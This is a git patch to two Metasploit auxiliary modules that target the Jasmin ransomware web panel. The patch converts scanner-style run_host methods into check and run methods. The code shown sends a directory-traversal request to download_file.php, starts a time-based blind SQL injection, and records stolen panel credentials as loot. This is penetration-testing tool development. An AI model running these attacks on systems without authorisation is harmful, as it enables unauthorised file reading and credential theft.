From 0dee8945ccdaa00215f79e0bc74f40bdee3db6c7 Mon Sep 17 00:00:00 2001 From: h00die Date: Thu, 25 Apr 2024 16:16:41 -0400 Subject: [PATCH] reviews for jasmin ransomware panel --- .../gather/jasmin_ransomware_dir_traversal.rb | 13 +++++++++---- modules/auxiliary/gather/jasmin_ransomware_sqli.rb | 11 +++++++---- 2 files changed, 16 insertions(+), 8 deletions(-) diff --git a/modules/auxiliary/gather/jasmin_ransomware_dir_traversal.rb b/modules/auxiliary/gather/jasmin_ransomware_dir_traversal.rb index 72da2fa8a56ef..fa83ab4d63413 100644 --- a/modules/auxiliary/gather/jasmin_ransomware_dir_traversal.rb +++ b/modules/auxiliary/gather/jasmin_ransomware_dir_traversal.rb @@ -6,7 +6,6 @@ class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient - include Msf::Auxiliary::Scanner def initialize(info = {}) super( @@ -47,27 +46,33 @@ def initialize(info = {}) ) end - def run_host(ip) + def check res = send_request_cgi( 'uri' => normalize_uri(target_uri.path) ) + return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil? + return Exploit::CheckCode::Safe("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200 - fail_with(Failure::NotFound, 'Check TARGETURI, Jasmin Dashboard not detected') unless res.body.include? 'Jasmin Dashboard' + Exploit::CheckCode::Detected('Jasmin Login page detected') if res.body.include? 'Jasmin Dashboard' + end + def run res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'download_file.php'), 'vars_get' => { 'file' => "#{'../' * datastore['DEPTH']}#{datastore['FILE']}" } ) + fail_with(Failure::Unknown, 'No response from server') if res.nil? fail_with(Failure::NotFound, 'Check FILE or DEPTH, file not found on server') if res.body.empty? + fail_with(Failure::UnexpectedReply, "Server returned an unexpected HTTP code: #{res.code}") unless res.code == 200 print_good(res.body) # store loot path = store_loot( 'jasmin.webpanel.dir.traversal', 'text/plain', - ip, + datastore['rhost'], res.body, File.basename(datastore['FILE']) ) diff --git a/modules/auxiliary/gather/jasmin_ransomware_sqli.rb b/modules/auxiliary/gather/jasmin_ransomware_sqli.rb index 39b6c738440f6..109038377f217 100644 --- a/modules/auxiliary/gather/jasmin_ransomware_sqli.rb +++ b/modules/auxiliary/gather/jasmin_ransomware_sqli.rb @@ -7,7 +7,6 @@ class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient include Msf::Exploit::SQLi - include Msf::Auxiliary::Scanner def initialize(info = {}) super( @@ -49,13 +48,17 @@ def initialize(info = {}) ) end - def run_host(ip) + def check res = send_request_cgi( 'uri' => normalize_uri(target_uri.path) ) + return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil? + return Exploit::CheckCode::Safe("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200 - fail_with(Failure::NotFound, 'Check TARGETURI, Jasmin Dashboard not detected') unless res.body.include? 'Jasmin Dashboard' + Exploit::CheckCode::Detected('Jasmin Login page detected') if res.body.include? 'Jasmin Dashboard' + end + def run @sqli = create_sqli(dbms: MySQLi::TimeBasedBlind) do |payload| check_char = Rex::Text.rand_text_alpha_lower(5) res = send_request_cgi({ @@ -88,7 +91,7 @@ def run_host(ip) private_type: :password, private_data: user[1], service_name: 'Jasmin Webpanel', - address: ip, + address: datastore['RHOST'], port: datastore['RPORT'], protocol: 'tcp', status: Metasploit::Model::Login::Status::UNTRIED